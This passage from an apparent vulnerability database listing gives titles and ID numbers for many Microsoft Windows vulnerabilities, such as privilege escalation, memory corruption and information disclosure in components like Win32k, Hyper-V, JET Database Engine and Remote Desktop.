Windows up to Server 2019 Media Service privilege escalation [155096] Microsoft Windows up to Server 2019 Script Runtime memory corruption [155092] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [155091] Microsoft Windows up to Server 2019 Win32k privilege escalation [155090] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155089] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [155087] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155086] Microsoft Windows up to Server 2019 Block Level Backup Engine Service privilege escalation [155084] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [155080] Microsoft Windows up to Server 2019 Graphics Component memory corruption [155079] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155078] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155077] Microsoft Windows up to Server 2019 Color Management ICM32.dll memory corruption [155072] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153289] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [153286] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153284] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153281] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153280] Microsoft Windows up to Server 2019 Push Notification Service information disclosure [153279] Microsoft Windows up to Server 2019 User-Mode Power Service privilege escalation [153278] Microsoft Windows up to Server 2019 Update Client privilege escalation [153277] Microsoft Windows up to Server 2019 System Assessment Tool privilege escalation [153275] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153274] Microsoft Windows up to Server 2019 Kernel information disclosure [153273] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153272] Microsoft Windows up to Server 2019 Kernel privilege escalation [153270] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153269] Microsoft Windows up to Server 2019 Kernel privilege escalation [153268] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153266] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153265] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153264] Microsoft Windows up to Server 2019 DNS denial of service [153263] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153261] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153260] Microsoft Windows Graphics Component information disclosure [153259] Microsoft Windows up to Server 2019 Update Stack privilege escalation [153257] Microsoft Windows up to Server 2019 privilege escalation [153256] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153244] Microsoft Windows up to Server 2019 GDI+ memory corruption [153243] Microsoft Windows up to Server 2019 Win32k information disclosure [153241] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153240] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153239] Microsoft Windows up to Server 2019 Kernel information disclosure [153237] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153236] Microsoft Windows up to Server 2019 GDI information disclosure [153235] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [153234] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153233] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153232] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153230] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153229] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153228] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [153227] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153225] Microsoft Windows up to Server 2019 Scheduled Task privilege escalation [153224] Microsoft OneDrive on Windows privilege escalation [153223] Microsoft Windows up to Server 2019 WpcDesktopMonSvc privilege escalation [153214] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153213] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153212] Microsoft Windows up to Server 2019 Kernel privilege escalation [153207] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153206] Microsoft Windows up to Server 2019 DirectX privilege escalation [153204] Microsoft Windows up to Server 2019 information disclosure [153203] Microsoft Windows up to Server 2019 privilege escalation [153200] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153198] Microsoft Windows up to Server 2019 Win32k memory corruption [153197] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [153196] Microsoft Windows up to Server 2019 Win32k memory corruption [153195] Microsoft Windows up to Server 2019 DirectX privilege escalation [153190] Microsoft Windows up to Server 2019 Codecs Library memory corruption [153189] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153188] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153187] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153185] Microsoft Windows up to Server 2019 Hyper-V memory corruption [153181] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153180] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153176] Microsoft Windows up to Server 2019 Graphics Component memory corruption [153175] Microsoft Windows up to Server 2019 Graphics memory corruption [152075] Microsoft Windows up to Server 2019 Type 1 Font Parser privilege escalation [151174] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151171] Microsoft Windows 10 1607/Server 2016 Graphics Component privilege escalation [151170] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151169] Microsoft Windows up to Server 2019 Hardlink privilege escalation [151164] Microsoft Windows up to Server 2019 Win32k privilege escalation [151163] Microsoft Windows up to Server 2019 Graphics Component information disclosure [151161] Microsoft Windows up to Server 2019 GDI information disclosure [151160] Microsoft Windows up to Server 2019 GDI information disclosure [151158] Microsoft Windows up to Server 2019 Win32k privilege escalation [151157] Microsoft Windows up to Server 2019 Win32k information disclosure [151156] Microsoft Windows up to Server 2019 GDI information disclosure [151154] Microsoft Windows up to Server 2019 Network Connections Service information disclosure [151153] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151152] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151151] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151150] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151149] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151148] Microsoft Windows Connected User Experiences/Telemetry Service information disclosure [151147] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [151146] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151145] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [151141] Microsoft Windows up to Server 2019 Imaging information disclosure [151139] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [151138] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151136] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151135] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151132] Microsoft Windows up to Server 2019 Media Foundation information disclosure [151129] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151127] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [151113] Microsoft Windows up to Server 2019 Win32k privilege escalation [151112] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [151110] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [151109] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151108] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151106] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151104] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151103] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [151102] Microsoft Windows up to Server 2019 Error Reporting information disclosure [151101] Microsoft Windows up to Server 2019 GDI information disclosure [151100] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151099] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [151098] Microsoft Windows up to Server 2019 CSC Service privilege escalation [151097] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151096] Microsoft Windows up to Server 2019 CSC Service privilege escalation [151095] Microsoft Windows up to Server 2019 Defender privilege escalation [151094] Microsoft Windows up to Server 1909 Defender privilege escalation [151091] Microsoft Windows up to Server 2019 DirectX privilege escalation [151078] Microsoft Windows up to Server 2019 GDI+ memory corruption [151077] Microsoft Windows up to Server 2019 GDI+ memory corruption [151064] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151063] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151062] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151061] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151060] Microsoft Windows up to Server 2019 lnk File privilege escalation [149967] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149966] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149963] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149962] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Hyper-V privilege escalation [149961] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149960] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149959] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149958] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149957] Microsoft Windows up to Server 2019 Graphics Component information disclosure [149956] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149955] Microsoft Windows up to Server 2019 GDI memory corruption [149954] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149953] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149952] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149951] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149950] Microsoft Windows up to Server 2019 privilege escalation [149949] Microsoft Windows up to Server 2019 tapisrv.dll privilege escalation [149948] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [149947] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149945] Microsoft Windows 10/10 1607/Server 2016 DirectX privilege escalation [149944] Microsoft Windows up to Server 2019 Win32k privilege escalation [149943] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149942] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [149941] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [149940] Microsoft Windows up to Server 2019 Win32k privilege escalation [149939] Microsoft Windows up to Server 2019 Win32k privilege escalation [149938] Microsoft Windows up to Server 2019 Win32k privilege escalation [149937] Microsoft Windows up to Server 2019 Win32k privilege escalation [149936] Microsoft Windows up to Server 2019 Win32k privilege escalation [149935] Microsoft Windows up to Server 2019 Win32k privilege escalation [149934] Microsoft Windows up to Server 2019 Win32k privilege escalation [149933] Microsoft Windows up to Server 2019 Win32k privilege escalation [149932] Microsoft Windows up to Server 2019 Win32k information disclosure [149931] Microsoft Windows up to Server 2016 Win32k information disclosure [149930] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149929] Microsoft Windows up to Server 2019 DirectX information disclosure [149928] Microsoft Windows 10/Server 2016 DirectX privilege escalation [149927] Microsoft Windows up to Server 2019 Imaging Library memory corruption [149926] Microsoft Windows up to Server 2019 IME privilege escalation [149923] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [149922] Microsoft Windows up to Server 2019 Wireless Network Manager privilege escalation [149921] Microsoft Windows up to Server 2019 Backup Service privilege escalation [149920] Microsoft Windows up to Server 2019 Client License Service privilege escalation [149919] Microsoft Windows up to Server 2019 Telephony Service information disclosure [149913] Microsoft Windows up to Server 2019 Win32k privilege escalation [149910] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [149909] Microsoft Windows up to Server 2019 COM Server privilege escalation [149907] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149906] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149905] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149904] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [149903] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149902] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149901] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149900] Microsoft Windows up to Server 2019 Kernel privilege escalation [149899] Microsoft Windows up to Server 2019 Kernel privilege escalation [149898] Microsoft Windows up to Server 2019 Kernel privilege escalation [149897] Microsoft Windows up to Server 2019 Kernel privilege escalation [149896] Microsoft Windows up to Server 2019 Kernel privilege escalation [149895] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149894] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149893] Microsoft Windows up to Server 2019 Active Directory privilege escalation [149891] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [149890] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [149889] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149888] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [149887] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [149886] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [149884] Microsoft Windows up to Server 2019 Media Foundation memory corruption [149883] Microsoft Windows up to Server 2019 LNK privilege escalation [149882] Microsoft Windows up to Server 2019 memory corruption [149881] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149880] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149312] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149039] Microsoft Windows 10 1803/Server 2019 RDP Session Lockscreen weak authentication [148654] Microsoft Windows up to Server 2019 Memory Section privilege escalation [148653] Microsoft Windows up to Server 2019 Win32k privilege escalation [148652] Microsoft Windows up to Server 2019 Media Service privilege escalation [148651] Microsoft Windows up to Server 2019 Update Notification Manager privilege escalation [148650] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Subsystem for Linux privilege escalation [148649] Microsoft Windows up to Server 2019 Symbolic Link privilege escalation [148648] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [148638] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Win32k privilege escalation [148637] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [148634] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [148631] Microsoft Windows Server 2016/Server 2019 Remote Desktop Gateway privilege escalation [148629] Microsoft Windows up to Server 2019 Hard Link privilege escalation [148627] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [148626] Microsoft Windows Remote Desktop Gateway privilege escalation [148625] Microsoft Windows Remote Desktop Gateway privilege escalation [148614] Microsoft Windows up to Server 2019 GDI+ information disclosure [148613] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148612] Microsoft Windows Remote Desktop Credentials information disclosure [148611] Microsoft Windows up to Server 2016 Graphics Component information disclosure [148610] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148609] Microsoft Windows up to Server 2019 Win32k information disclosure [148608] Microsoft Windows up to Server 2019 Graphics Component information disclosure [148607] Microsoft Windows up to Server 2019 CryptoAPI Crypt32.dll weak authentication [146926] Microsoft Windows XP SP3 Remote Desktop Protocol information disclosure [146924] Microsoft Windows up to Server 2019 Defender memory corruption [146879] Microsoft Windows up to Server 2019 OLE privilege escalation [146878] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [146877] Microsoft Windows 7 SP1 Windows Media Player information disclosure [146876] Microsoft Windows 7 SP1 Windows Media Player information disclosure [146875] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 COM Server privilege escalation [146874] Microsoft Windows 10 1809/Server 2019 Printer Service privilege escalation [146873] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [146872] Microsoft Windows up to Server 2019 Kernel information disclosure [146871] Microsoft Windows up to Server 2019 Kernel information disclosure [146870] Microsoft Windows up to Server 2019 Hyper-V information disclosure [146869] Microsoft Windows up to Server 2019 GDI information disclosure [146868] Microsoft Windows up to Server 2019 GDI information disclosure [146867] Microsoft Windows up to Server 2019 GDI information disclosure [146862] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [146858] Microsoft Windows up to Server 2019 Win32k information disclosure [146857] Microsoft Windows up to Server 2016 Win32k privilege escalation [146855] Microsoft Windows up to Server 2019 Win32k Graphics privilege escalation [146804] Microsoft Windows Media Center XML External Entity [145412] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145402] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145394] Microsoft Windows up to Server 2019 Win32k information disclosure [145393] Microsoft Windows up to Server 2019 GDI information disclosure [145390] Microsoft Windows up to Server 2019 Win32k information disclosure [145388] Microsoft Windows up to Server 2012 R2 Win32k privilege escalation [145386] Microsoft Windows up to Server 2012 R2 DirectWrite information disclosure [145384] Microsoft Windows up to Server 2019 NetLogon Security Feature privilege escalation [145382] Microsoft Windows up to Server 2019 iphlpsvc.dll privilege escalation [145380] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [145379] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145377] Microsoft Windows up to Server 2019 Installer privilege escalation [145375] Microsoft Windows up to Server 2012 R2 OpenType Font Driver ATMFD.dll information disclosure [145374] Microsoft Windows up to Server 2019 DirectWrite information disclosure [145373] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [145372] Microsoft Windows up to Server 2019 Win32k privilege escalation [145370] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [145367] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145366] Microsoft Windows up to Server 2019 Win32k privilege escalation [145365] Microsoft Windows up to Server 2019 Win32k privilege escalation [145364] Microsoft Windows up to Server 2019 Win32k privilege escalation [145363] Microsoft Windows up to Server 2019 Win32k privilege escalation [145362] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Kernel privilege escalation [145361] Microsoft Windows up to Server 2019 privilege escalation [145360] Microsoft Windows up to Server 2019 Certificate Dialog privilege escalation [145359] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [145358] Microsoft Windows up to Server 2019 Netlogon privilege escalation [145357] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145356] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [145355] Microsoft Windows up to Server 2019 Servicing Stack information disclosure [145353] Microsoft Windows 10 1809/10 1903/Server 2019 Data Sharing Service privilege escalation [145352] Microsoft Windows up to Server 2019 Error Reporting information disclosure [145350] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [145349] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145348] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145346] Microsoft Windows up to Server 2019 Kernel information disclosure [145345] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145344] Microsoft Windows up to Server 2019 privilege escalation [145342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k Graphics memory corruption [145341] Microsoft Windows 10 1903/Server 1903 Media Foundation memory corruption [145340] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145334] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145333] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145332] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [145331] Microsoft Windows up to Server 2019 Hyper-V Switch privilege escalation [143118] Microsoft Windows up to Server 2019 IIS memory corruption [143116] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI information disclosure [143115] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [143114] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [143113] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143112] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143103] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [143102] Microsoft Windows up to Server 2019 Power Service umpo.dll privilege escalation [143101] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [143100] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143099] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 NTLMv2 weak encryption [143098] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client information disclosure [143097] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143096] Microsoft Windows up to Server 2019 Kernel information disclosure [143090] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [143089] Microsoft Windows up to Server 2019 rdbss.sys memory corruption [143088] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143084] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143083] Microsoft Windows up to Server 2019 TLS information disclosure [143082] Microsoft Windows up to Server 2019 Hardlink privilege escalation [143081] Microsoft Windows up to Server 2019 Setup privilege escalation [143080] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143077] Microsoft Windows up to Server 2019 Imaging API memory corruption [143076] Microsoft Windows 10 1703/10 1709/10 1803/Server 1803/Server 2019 Hyper-V privilege escalation [143075] Microsoft Windows up to Server 2019 NTLM MIC weak authentication [143071] Microsoft Windows up to Server 2019 MS XML XML External Entity [143063] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [142140] Microsoft Windows Defender File privilege escalation [141652] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [141637] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141631] Microsoft Windows up to Server 2019 SMB Client Driver information disclosure [141630] Microsoft Windows up to Server 2019 memory corruption [141629] Microsoft Windows up to Server 2019 Update Delivery Optimization privilege escalation [141627] Microsoft Windows up to Server 2019 GDI information disclosure [141626] Microsoft Windows up to Server 2019 Win32k privilege escalation [141625] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 DirectX memory corruption [141624] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [141621] Microsoft Windows up to Server 2019 Kernel information disclosure [141620] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [141619] Microsoft Windows up to Server 2019 ALPC privilege escalation [141618] Microsoft Windows up to Server 2019 hdAudio.sys privilege escalation [141617] Microsoft Windows up to Server 2019 Store Installer privilege escalation [141616] Microsoft Windows up to Server 2019 ALPC privilege escalation [141615] Microsoft Windows up to Server 2019 Winlogon privilege escalation [141614] Microsoft Windows up to Server 2019 Compatibility Appraiser privilege escalation [141606] Microsoft Windows up to Server 2019 Win32k privilege escalation [141605] Microsoft Windows up to Server 2019 Hyper-V information disclosure [141604] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141603] Microsoft Windows up to Server 2019 GDI information disclosure [141602] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141601] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141600] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141599] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141598] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141597] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141596] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141595] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141594] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141593] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141592] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141591] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141590] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [141581] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [141580] Microsoft Windows up to Server 2019 Transaction Manager information disclosure [141579] Microsoft Windows up to Server 2016 DirectX information disclosure [141577] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [141575] Microsoft Windows up to Server 2019 lnk File privilege escalation [141563] Microsoft Windows up to RT 8.1 Remote Desktop privilege escalation [141562] Microsoft Windows up to RT 8.1 Remote Desktop privilege escalation [141561] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [141560] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [139972] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139971] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139970] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139969] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139968] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139966] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [139965] Microsoft Windows up to Server 2019 Kernel information disclosure [139964] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139963] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139962] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [139960] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139958] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139955] Microsoft Windows up to Server 2019 SyncController.dll privilege escalation [139949] Microsoft Windows up to Server 2019 XmlLite Runtime XmlLite.dll XML External Entity [139941] Microsoft Windows up to Server 2019 DirectX privilege escalation [139937] Microsoft Windows up to Server 2019 Azure Active Directory information disclosure [139936] Microsoft Windows up to Server 2019 SymCrypt information disclosure [139935] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 NTFS privilege escalation [139934] Microsoft Windows 7 SP1/Server 2018 R2 SP1/Server 2018 SP2 Win32k privilege escalation [139933] Microsoft Windows up to Server 2019 p2pimsvc privilege escalation [139932] Microsoft Windows up to Server 2019 Kernel privilege escalation [139931] Microsoft Windows up to Server 2019 File Signature Security Feature 7PK Security Features [139930] Microsoft Windows up to Server 2019 ALPC privilege escalation [139928] Microsoft Windows up to Server 2019 Kernel privilege escalation [139927] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139926] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139925] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139924] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139923] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Graphics Component information disclosure [139922] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139921] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139920] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139919] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139918] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139917] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139916] Microsoft Windows up to Server 2019 XML Core Services MSXML Parser XML External Entity [139914] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139913] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139912] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Hyper-V Network Switch privilege escalation [139911] Microsoft Windows up to Server 2019 memory corruption [139910] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139909] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139908] Microsoft Windows up to Server 2019 Bluetooth weak encryption [139907] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139906] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139905] Microsoft Windows Server 2008 SP2 DHCP Server memory corruption [139895] Microsoft Windows up to Server 2019 lnk File privilege escalation [139894] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [139893] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139892] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139891] Microsoft Windows up to Server 2019 Font Library privilege escalation [139890] Microsoft Windows up to Server 2019 Font Library privilege escalation [139889] Microsoft Windows up to Server 2019 Font Library privilege escalation [139888] Microsoft Windows up to Server 2019 Font Library privilege escalation [139887] Microsoft Windows up to Server 2019 Font Library privilege escalation [139886] Microsoft Windows up to Server 2019 Font Library privilege escalation [139880] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [139879] Microsoft Windows up to Server 2019 DHCP Client memory corruption [139878] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139876] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139875] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139527] Microsoft Windows PowerShell privilege escalation [137586] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137585] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137584] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137583] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137582] Microsoft Windows ADFS Security Feature 7PK Security Features [137581] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137580] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137579] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137578] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137577] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137576] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137575] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137574] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137573] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137568] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [137567] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137566] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137565] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137564] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137563] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137562] Microsoft Windows up to Server 2019 Win32k information disclosure [137561] Microsoft Windows up to Server 2019 GDI information disclosure [137560] 